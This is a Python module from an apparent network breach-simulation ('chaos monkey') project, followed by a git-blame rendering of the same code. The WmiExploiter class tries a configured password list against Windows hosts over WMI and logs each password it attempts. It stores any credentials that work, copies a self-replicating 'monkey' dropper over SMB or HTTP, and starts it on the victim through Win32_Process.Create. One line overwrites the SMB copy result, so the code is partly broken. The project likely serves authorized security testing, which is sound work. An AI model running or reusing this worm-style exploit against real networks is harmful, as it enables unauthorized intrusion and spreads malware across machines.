monkey/chaos_monkey/exploit/wmiexec.py


import socket
import ntpath
import logging
import traceback
from model import DROPPER_CMDLINE, MONKEY_CMDLINE, MONKEY_CMDLINE_HTTP
from model.host import VictimHost
from exploit import HostExploiter
from exploit.tools import SmbTools, WmiTools, HTTPTools, AccessDeniedException, get_target_monkey

LOG = logging.getLogger(__name__)

class WmiExploiter(HostExploiter):
    _target_os_type = ['windows']

    def __init__(self):
        self._config = __import__('config').WormConfiguration

    @WmiTools.dcom_wrap
    def exploit_host(self, host, src_path=None):
        assert isinstance(host, VictimHost)

        src_path = src_path or get_target_monkey(host)

        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r", host)
            return False

        passwords = list(self._config.psexec_passwords[:])
        known_password = host.get_credentials(self._config.psexec_user)
        if known_password is not None:
            if known_password in passwords:
                passwords.remove(known_password)
            passwords.insert(0, known_password)

        for password in passwords:
            LOG.debug("Attempting to connect %r using WMI with password '%s'",
                      host, password)

            wmi_connection = WmiTools.WmiConnection()

            try:
                wmi_connection.connect(host,
                                       self._config.psexec_user,
                                       password)
            except AccessDeniedException:
                LOG.debug("Failed connecting to %r using WMI with password '%s'",
                          host, password)
                continue
            except socket.error, exc:
                LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",
                          host, password, exc)
                return False
            except Exception, exc:
                LOG.debug("Unknown WMI connection error to %r with password '%s' (%s):\n%s",
                          host, password, exc, traceback.format_exc())
                return False

            host.learn_credentials(self._config.psexec_user, password)

            # query process list and check if monkey already running on victim
            process_list = WmiTools.list_object(wmi_connection, "Win32_Process",
                                                fields=("Caption", ),
                                                where="Name='%s'" % ntpath.split(src_path)[-1])
            if process_list:
                wmi_connection.close()

                LOG.debug("Skipping %r - already infected", host)
                return False

            #copy the file remotely using SMB
            remote_full_path = SmbTools.copy_file(host,
                                                  self._config.psexec_user,
                                                  password,
                                                  src_path,
                                                  self._config.dropper_target_path)
            remote_full_path = False

            if not remote_full_path:
                remote_full_path = self._config.dropper_target_path
                http_path = HTTPTools.create_transfer(host,
                                          src_path,
                                          remote_full_path)
                cmdline = MONKEY_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': remote_full_path}
            # execute the remote dropper in case the path isn't final
            elif remote_full_path.lower() != self._config.dropper_target_path.lower():
                cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path}
            else:
                cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}

            # execute the remote monkey
            result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
                                                                                 ntpath.split(remote_full_path)[0],
                                                                                 None)

            if (0 != result.ProcessId) and (0 == result.ReturnValue):
                LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
                         remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)
                success = True
            else:
                LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
                          remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)
                success = False

            result.RemRelease()
            wmi_connection.close()

            return success

        return False
first commit 2015-08-30 15:27:35 +08:00
			`import socket`
			`import ntpath`
			`import logging`
			`import traceback`
- rdp exploitation - http file transfer - ftp server code for future support 2015-09-07 15:25:25 +08:00			`from model import DROPPER_CMDLINE, MONKEY_CMDLINE, MONKEY_CMDLINE_HTTP`
first commit 2015-08-30 15:27:35 +08:00			`from model.host import VictimHost`
			`from exploit import HostExploiter`
- c&c - support for virtual files (monkeyfs) - ssh exploitation - some linux support issues fixed 2015-09-29 22:58:06 +08:00			`from exploit.tools import SmbTools, WmiTools, HTTPTools, AccessDeniedException, get_target_monkey`
first commit 2015-08-30 15:27:35 +08:00
			`LOG = logging.getLogger(__name__)`

			`class WmiExploiter(HostExploiter):`
- c&c - support for virtual files (monkeyfs) - ssh exploitation - some linux support issues fixed 2015-09-29 22:58:06 +08:00			`_target_os_type = ['windows']`

first commit 2015-08-30 15:27:35 +08:00			`def __init__(self):`
			`self._config = __import__('config').WormConfiguration`

			`@WmiTools.dcom_wrap`
- c&c - support for virtual files (monkeyfs) - ssh exploitation - some linux support issues fixed 2015-09-29 22:58:06 +08:00			`def exploit_host(self, host, src_path=None):`
first commit 2015-08-30 15:27:35 +08:00			`assert isinstance(host, VictimHost)`

- c&c - support for virtual files (monkeyfs) - ssh exploitation - some linux support issues fixed 2015-09-29 22:58:06 +08:00			`src_path = src_path or get_target_monkey(host)`

			`if not src_path:`
			`LOG.info("Can't find suitable monkey executable for host %r", host)`
			`return False`

first commit 2015-08-30 15:27:35 +08:00			`passwords = list(self._config.psexec_passwords[:])`
			`known_password = host.get_credentials(self._config.psexec_user)`
			`if known_password is not None:`
			`if known_password in passwords:`
			`passwords.remove(known_password)`
			`passwords.insert(0, known_password)`

			`for password in passwords:`
			`LOG.debug("Attempting to connect %r using WMI with password '%s'",`
			`host, password)`

			`wmi_connection = WmiTools.WmiConnection()`

			`try:`
			`wmi_connection.connect(host,`
			`self._config.psexec_user,`
			`password)`
			`except AccessDeniedException:`
			`LOG.debug("Failed connecting to %r using WMI with password '%s'",`
			`host, password)`
			`continue`
			`except socket.error, exc:`
			`LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",`
			`host, password, exc)`
			`return False`
			`except Exception, exc:`
			`LOG.debug("Unknown WMI connection error to %r with password '%s' (%s):\n%s",`
			`host, password, exc, traceback.format_exc())`
			`return False`

			`host.learn_credentials(self._config.psexec_user, password)`

			`# query process list and check if monkey already running on victim`
			`process_list = WmiTools.list_object(wmi_connection, "Win32_Process",`
			`fields=("Caption", ),`
			`where="Name='%s'" % ntpath.split(src_path)[-1])`
			`if process_list:`
			`wmi_connection.close()`

			`LOG.debug("Skipping %r - already infected", host)`
			`return False`

- rdp exploitation - http file transfer - ftp server code for future support 2015-09-07 15:25:25 +08:00			`#copy the file remotely using SMB`
first commit 2015-08-30 15:27:35 +08:00			`remote_full_path = SmbTools.copy_file(host,`
			`self._config.psexec_user,`
			`password,`
			`src_path,`
			`self._config.dropper_target_path)`
- rdp exploitation - http file transfer - ftp server code for future support 2015-09-07 15:25:25 +08:00			`remote_full_path = False`
first commit 2015-08-30 15:27:35 +08:00
- rdp exploitation - http file transfer - ftp server code for future support 2015-09-07 15:25:25 +08:00			`if not remote_full_path:`
			`remote_full_path = self._config.dropper_target_path`
			`http_path = HTTPTools.create_transfer(host,`
			`src_path,`
			`remote_full_path)`
			`cmdline = MONKEY_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': remote_full_path}`
first commit 2015-08-30 15:27:35 +08:00			`# execute the remote dropper in case the path isn't final`
- rdp exploitation - http file transfer - ftp server code for future support 2015-09-07 15:25:25 +08:00			`elif remote_full_path.lower() != self._config.dropper_target_path.lower():`
first commit 2015-08-30 15:27:35 +08:00			`cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path}`
			`else:`
			`cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}`

			`# execute the remote monkey`
			`result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,`
			`ntpath.split(remote_full_path)[0],`
			`None)`

			`if (0 != result.ProcessId) and (0 == result.ReturnValue):`
			`LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",`
			`remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)`
			`success = True`
			`else:`
			`LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",`
			`remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)`
			`success = False`

			`result.RemRelease()`
			`wmi_connection.close()`

			`return success`

			`return False`